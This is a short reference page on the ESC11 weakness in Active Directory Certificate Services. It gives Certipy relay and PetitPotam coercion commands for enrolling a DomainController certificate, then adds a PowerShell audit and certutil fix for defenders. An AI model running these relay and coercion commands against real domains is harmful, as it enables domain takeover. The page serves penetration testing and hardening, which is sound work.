
ESC11

The vulnerability identified as ESC11 concerns the IF_ENFORCEENCRYPTICERTREQUEST flag on the MS-ICPR RPC interface of AD CS. When the CA does not enforce this flag, it accepts certificate requests over unencrypted RPC sessions. An attacker can then relay coerced SMB NTLM authentication to the AD CS ICPR endpoint (with tools such as ntlmrelayx.py or Certipy) and, if the relay succeeds, enroll certificates from any template the relayed account is authorized for.

Linux

Abusing ESC11 with Certipy

Set up the relay

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

Coerce authentication with PetitPotam

bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>

Certipy receiving authentication from the AD DC (LAB-DC$)

bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController

From here on, we can follow the steps from the ESC8 attack chain.
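To check whether a CA is exposed to this condition, the following PowerShell audit (an added example, not code from the original page or from Certipy) reads the CA's InterfaceFlags from the registry and tests the IF_ENFORCEENCRYPTICERTREQUEST bit. It assumes it runs locally on the CA host with rights to read HKLM; the bit value 0x200 is taken from the MS-CSRA InterfaceFlags definition, and the function name is our own.

```powershell
# Added example (not part of the original page): audit a CA host for the
# ESC11 condition, i.e. IF_ENFORCEENCRYPTICERTREQUEST not enforced.
# Assumes local execution on the CA with read access to HKLM.

# Bit value from the MS-CSRA InterfaceFlags definition.
$IF_ENFORCEENCRYPTICERTREQUEST = 0x200

function Test-Esc11InterfaceFlags {
    [CmdletBinding()]
    param(
        # Optional CA name; defaults to the "Active" CA recorded by certsvc.
        [string]$CAName
    )

    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    if (-not $CAName) {
        $CAName = (Get-ItemProperty -Path $base -Name Active -ErrorAction Stop).Active
    }

    # InterfaceFlags lives under the per-CA configuration key.
    $caKey = Join-Path -Path $base -ChildPath $CAName
    $flags = (Get-ItemProperty -Path $caKey -Name InterfaceFlags -ErrorAction Stop).InterfaceFlags

    $enforced = (($flags -band $IF_ENFORCEENCRYPTICERTREQUEST) -ne 0)

    # Same fix certutil applies; the service must restart to pick it up.
    $remediation = $null
    if (-not $enforced) {
        $remediation = 'certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST; Restart-Service certsvc'
    }

    [pscustomobject]@{
        CAName           = $CAName
        InterfaceFlags   = ('0x{0:X}' -f $flags)
        EncryptionForced = $enforced
        Exposed          = (-not $enforced)
        Remediation      = $remediation
    }
}

# Usage: report the active CA's state.
Test-Esc11InterfaceFlags
```

The equivalent read-only check without the script is `certutil -getreg CA\InterfaceFlags`, which prints the flag names currently set.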

ESC8